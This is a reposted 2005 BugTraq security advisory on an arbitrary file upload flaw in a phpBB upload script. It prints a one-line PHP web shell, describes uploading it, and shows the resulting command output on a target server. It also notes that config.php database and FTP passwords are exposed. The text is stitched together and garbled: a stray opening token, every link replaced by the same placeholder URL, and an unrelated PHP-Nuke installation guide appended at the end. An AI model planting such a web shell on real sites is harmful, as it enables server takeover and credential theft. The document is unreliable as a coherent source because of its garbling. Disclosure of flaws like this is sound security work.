ecker1

To: BugTraq Subject: phpBB Upload Script "up.php" Arbitrary File Upload Date: Apr 8 2005 2:21AM Author: Status-x <phr4xz gmail com> Message-ID: <81ceb96d050407192175d0e344@mail.gmail.com> ##################################################################### Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload" $ Author: Status-x $ Contact: phr4xz gmail com - status-x hackersoft net $ Date: 7 April 2005 $ Website: http://forums.xisto.com/no_longer_exists/ $ Original Advisory: http://forums.xisto.com/no_longer_exists/ $ Risk: High $ Vendor URL: https://www.phpbb.com/ $ Affected Software: phpBB 2.0.x Note: Sorry if it has been posted before ##################################################################### -= Description =- phpBB its a forums system written in php which can support images, polls, private messages and more https://www.phpbb.com/ --------------------------------------------------------------------------- -= Vulnerabilities =- - | "Arbitrary File Upload" | In phpBB forums there is an script which can allow to remote and registered users to upload files with arbitrary content and with any extension. I didnt found any website where i can download the script so i couldnt check who made it. - | Examples: | We can create and example code to upload it to the "test site" <? system($cmd) ?> And save it as cmd.php. The we enter to: -------------------------- http://forums.xisto.com/no_longer_exists/ -------------------------- And upload our code, to see our file we just enter to: ----------------------------------- http://forums.xisto.com/no_longer_exists/ ----------------------------------- And we could see that our file has been uploaded: Warning: system(): Cannot execute a blank command in /home/target/public_html/forum/uploads/tetx.php on line 2 The we can execute *NIX commands to obtain extremely compromising info that could end with the "deface" of the affected site: ----------------------------------------------------- Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux /home/target/public_html/forum/uploads uid=32029(target) gid=530(target) groups=530(target) ------------------------------------------------------ This is just an example to what can be done by a malicious attacker. - | "Password Disclosure" | The remote or local attacker can also read the config.php file disclosing the information about the DB and possible the FTP password ------------------------------------------------------ Example -= How to FIX =- Just filter the allowed extensions of the uploaded files in the up.php source. -= Contact =- Status-x phr4xz gmail com http://forums.xisto.com/no_longer_exists/ From url: http://www.securityfocus.com/archive/1/395351

Download PHPNuke (https://www.phpnuke.org/) and unzip it into a directory. Now goto where your web server is installed (or web hosting ftp)!Create a folder and call it phpnuke. Now upload everything from the HTML folder into the phpnuke folder you created.Than go to the config file of phpnuke (\phpnuke\config.php)Ok now, if you have phpedit installed than this will be easier than using Notepad.Go to line 32 and you sould see this:$dbhost = "localhost";$dbuname = "root";$dbpass = "";$dbname = "nuke";$prefix = "nuke";$user_prefix = "nuke";$dbtype = "MySQL";If this is confusing, don't worry!Leave $dbhost = "localhost"; to how it is.For $dbuname = "root"; replace root with your Username for mySQL.For $dbpass = ""; put between the "" with your password for the user name.For $dbname = "nuke"; replace nuke with the database you want.Leave the rest the way it is unless you know what your doing!Now, go to your phpMyAdmin, select your database.SQL / Locate the nuke.sql (sql/nuke.sql) clic in 'go' to continue.Enjoy!